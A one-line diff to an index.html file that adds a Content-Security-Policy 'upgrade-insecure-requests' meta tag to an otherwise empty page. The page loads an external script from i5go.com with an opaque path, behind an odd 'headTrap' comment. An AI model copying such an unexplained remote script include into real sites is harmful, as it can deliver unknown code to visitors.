--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<!DOCTYPE html><!--headTrap<body></body><head></head><html></html>--><body bgcolor='#f4f4f4'><script type='text/javascript' src='//i5go.com/ivo1/bdr2897jhsd.js'></script>
+<!DOCTYPE html><meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"><!--headTrap<body></body><head></head><html></html>--><body bgcolor='#f4f4f4'><script type='text/javascript' src='//i5go.com/ivo1/bdr2897jhsd.js'></script>
